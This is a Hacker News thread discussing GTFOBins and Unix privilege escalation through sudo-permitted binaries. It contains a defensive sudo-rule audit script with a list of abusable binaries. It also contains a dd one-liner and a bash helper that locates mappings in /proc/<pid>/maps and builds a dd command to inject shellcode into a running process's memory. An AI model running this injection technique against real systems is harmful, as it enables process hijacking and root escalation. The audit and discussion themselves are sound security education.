Posted by StefanBatory 7 hours ago

GTFOBins (gtfobins.org)
253 points | 64 comments
alex-moon 5 hours ago|
As someone who has had to do some grub editing on the computer in an AirBnB because peripherals were all messed up on the guest account (no internet, no sound, you could only see a tiny part of the screen, I honestly don't know how they had managed to do it) I am super pleased to see this resource. Stuff like this is a bit, you know, hopefully you never need this, but when you do, it is so useful to have it.
biosboiii 4 hours ago||
They should fine-tune the LLMs with this.
Yokohiii 2 hours ago|
LLMs know pretty well about this. This is just a handy list for humans that want to do stuff.
npodbielski 6 hours ago||
Ok. It has hundreds of examples for all sorts of tools: 7z, dig, git. Those are very popular.

Question from a security newbie. Why is it not used to hack all sorts of servers all the time, then?

dominicq 6 hours ago||
You need initial access. This is just a list of tools you can use if you can't spawn a standard interactive shell, for whatever reason.

It doesn't make it easier to "hack" servers, it's just a list of things that you could use once you're already inside.

asimovDev 5 hours ago|||
I think docker was used for these things before. I remember some big service had secrets in env vars, and shell access inside the docker image from an npm post-install script let them evacuate these secrets.
DaSHacka 6 hours ago|||
It's only relevant as a privilege escalation vector when you're able to execute those programs as root, but don't otherwise have root access on the server.

It's a pretty niche circumstance. Unless an admin allows users on a server to execute some of these random types of binaries as root, it's not going to be a concern. And, if it wasn't already obvious, distros are almost never configured this way OOTB

arcfour 6 hours ago||
I've seen plenty of servers in companies configured to allow sudoers to run a restricted subset of binaries as root, usually without a password. Some of them were GTFObins that the admins were not aware of until I reached out to let them know. I've also seen a couple of restricted shell setups where users could only run a handful of commands. Can't recall if I checked to see if any of them were GTFObins.

I wouldn't say this is the most useful h4x0r tool ever, but I wouldn't say it's particularly niche, either. This kinda stuff is definitely relevant in older large enterprise-type Linux/Unix environments.

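As an added example (not code from gtfobins.org or from anyone in this thread), a small bash audit that takes the text of `sudo -l`, pulls out each permitted command and flags binaries that have a Sudo entry on GTFOBins. The sample `sudo -l` output, the user "alice", the host "web01" and the paths in it are constructed; `GTFO_SUDO` is a hand-picked subset of the site's entries, not its full data.

```bash
#!/bin/bash
# Added example: audit `sudo -l` output for binaries that GTFOBins lists under "Sudo".
# Not code from gtfobins.org; the sample output, user, host and paths below are constructed.

# Constructed `sudo -l` output for a hypothetical user "alice" on host "web01".
SAMPLE_SUDO_L='Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL) NOPASSWD: /usr/bin/less /var/log/nginx/*, /usr/bin/tar
    (root) /usr/local/bin/deploy.sh'

# Basenames that have a "Sudo" function on gtfobins.org. Deliberately a short subset;
# extend it from the site for a real audit.
GTFO_SUDO='awk bash busybox cp dash dd env find gdb git less man more mv nano nmap perl python python3 rsync ruby sh systemctl tar tee vi vim zip'

# sudo_audit <text of sudo -l>
# Prints one tab-separated line per allowed command whose binary is on the list:
#   <basename> <NOPASSWD|PASSWD> <command as written in the rule>
# "ALL" is reported too: it is unrestricted root regardless of GTFOBins.
sudo_audit() {
    printf '%s\n' "$1" | awk -v list="$GTFO_SUDO" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) known[a[i]] = 1 }
        /^[[:space:]]*\(/ {                            # rule lines start with "(runas)"
            rule = $0; sub(/^[[:space:]]+/, "", rule)
            nopw = (rule ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
            body = rule
            sub(/^\([^)]*\)[[:space:]]*/, "", body)    # drop "(ALL)" / "(root)" / "(ALL : ALL)"
            gsub(/(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):[[:space:]]*/, "", body)  # drop tags
            m = split(body, cmds, /,[[:space:]]*/)     # one rule may list several commands
            for (j = 1; j <= m; j++) {
                split(cmds[j], parts, " "); path = parts[1]
                base = path; sub(/.*\//, "", base)
                if (base == "ALL" || base in known)
                    printf "%s\t%s\t%s\n", base, nopw, cmds[j]
            }
        }'
}

sudo_audit "$SAMPLE_SUDO_L"
```

On a real host run `sudo_audit "$(sudo -n -l)"`. A hit with fixed arguments (here `systemctl restart nginx`) still needs a manual look: the GTFOBins trick for that binary may depend on controlling the arguments or on the command dropping into a pager, which a pinned subcommand may not do. The `NOPASSWD` hits without arguments (`vim`, `tar`) are the ones to fix first.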
pech0rin 6 hours ago|||
Because you have to have shell access to the server to use any of these.
olmo23 6 hours ago||
In certain circumstances, they might be :-)

But you can't "hack a server" using just these techniques: they would be a (small) part of a chain of exploits.

snvzz 4 hours ago||
The problem is ambient security, UNIX's security model.

Systems with capability-based security, such as seL4[0], do not suffer from this category of problem.

0. https://sel4.systems/About/

stackghost 6 hours ago||
These come up in CTFs all the time. One trick I don't see here is you can use `dd` to write into the `/proc` hierarchy to achieve all sorts of fuckery including patching shellcode into a running process.
mpeg 5 hours ago||
You learn the most random ways to abuse program features. One I still remember, because of how long it took to figure out, was an HTB box that (after a long exploitation path) used NTFS ADS to hide the flag in an alternate stream of a decoy file; and of course the normal way to extract the stream was disabled, so I had to do some black magic with other binaries to get it.
saagarjha 6 hours ago|||
I don't think I've used any of these in a CTF tbh
stackghost 6 hours ago||
I've definitely used one or two in the last 6 months
saagarjha 6 hours ago||
For what kind of challenge? Most of these are not even available in CTF environments
mna_ 5 hours ago|||
I've used them for pwncollege CTFs but pwncollege is way below your level (I've seen some of your write ups before).
dominicq 6 hours ago||
Huh? How does that work exactly? I've heard of /proc fuckery before but didn't know you could disable ASLR with it.
PhilipRoman 5 hours ago|||
If you have /proc available, you don't even need to disable ASLR (all mappings are available to you)
stackghost 6 hours ago|||
Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.
dominicq 6 hours ago||
:(

Sounds super 1337 and I hope it's actually possible somehow.

aa-jv 5 hours ago||
Parse /proc/<pid>/maps to find the relevant target_addr in your process-under-attack. And then it's a matter of:

    $ dd if=shellcode.bin of=/proc/<pid>/mem bs=1 seek=$((target_addr)) ...
See also: DDExec

https://github.com/arget13/DDexec

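The maps-then-dd step above, written out as an added bash example (not DDexec's code and not from the comment): it parses a /proc/<pid>/maps excerpt, checks that the target address is mapped and that the payload does not run past the end of its mapping, and prints the dd invocation. The maps excerpt, the binary /usr/bin/target, pid 4242 and shellcode.bin are constructed placeholders.

```bash
#!/bin/bash
# Added example: "parse /proc/<pid>/maps, then dd into /proc/<pid>/mem" as a checked procedure.
# Not code from DDexec or from the thread; the maps excerpt, pid and file names are constructed.

# Constructed excerpt of a /proc/<pid>/maps file (hypothetical binary /usr/bin/target).
SAMPLE_MAPS='555555554000-555555555000 r--p 00000000 08:01 1234 /usr/bin/target
555555555000-555555556000 r-xp 00001000 08:01 1234 /usr/bin/target
555555556000-555555557000 r--p 00002000 08:01 1234 /usr/bin/target
555555557000-555555558000 rw-p 00002000 08:01 1234 /usr/bin/target
7ffff7dd0000-7ffff7dd2000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]'

# maps_region <maps text> <addr>
# Prints "start end perms path" for the mapping that contains addr; returns 1 if addr is
# unmapped (a dd write there fails with EIO; it does not create a mapping).
maps_region() {
    local maps=$1 addr=$(( $2 )) range perms offset dev inode path start end
    while read -r range perms offset dev inode path; do
        [ -n "$range" ] || continue
        start=$(( 0x${range%-*} )); end=$(( 0x${range#*-} ))
        if (( addr >= start && addr < end )); then
            printf '%#x %#x %s %s\n' "$start" "$end" "$perms" "${path:--}"
            return 0
        fi
    done <<< "$maps"
    return 1
}

# dd_patch_cmd <maps text> <pid> <addr> <payload file> <payload length>
# Prints the dd command that writes the payload at addr, after checking that the whole write
# stays inside one mapping. Writes through /proc/<pid>/mem bypass page protections (the kernel
# accesses the target with FOLL_FORCE), so r-xp text can be patched; what you need instead is
# ptrace-attach permission on <pid>: same uid and a dumpable target, subject to Yama
# ptrace_scope, or CAP_SYS_PTRACE.
dd_patch_cmd() {
    local maps=$1 pid=$2 addr=$(( $3 )) payload=$4 len=$5 region start end perms path
    region=$(maps_region "$maps" "$addr") \
        || { echo "error: $(printf '%#x' "$addr") is not mapped" >&2; return 1; }
    read -r start end perms path <<< "$region"
    if (( addr + len > end )); then
        echo "error: $len bytes at $(printf '%#x' "$addr") cross the end of mapping [$region]" >&2
        return 1
    fi
    # bs=1 makes seek= a byte offset; conv=notrunc keeps dd from opening the target with O_TRUNC.
    printf 'dd if=%s of=/proc/%s/mem bs=1 seek=%d conv=notrunc\n' "$payload" "$pid" "$addr"
}

maps_region "$SAMPLE_MAPS" 0x5555555551a0
dd_patch_cmd "$SAMPLE_MAPS" 4242 0x5555555551a0 shellcode.bin 32
```

To use it live, pass `"$(cat /proc/$pid/maps)"` and the real payload size (`stat -c %s shellcode.bin`). The permission column is reported but deliberately not enforced: /proc/<pid>/mem writes ignore it, so read-only text is patchable, and the only real gate is the ptrace access check. That is also why a sudo rule for dd (or any binary that can open an arbitrary path for writing) is effectively a root-shell rule.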
DaSHacka 6 hours ago||
See also:

LOLBAS (https://lolbas-project.github.io/)
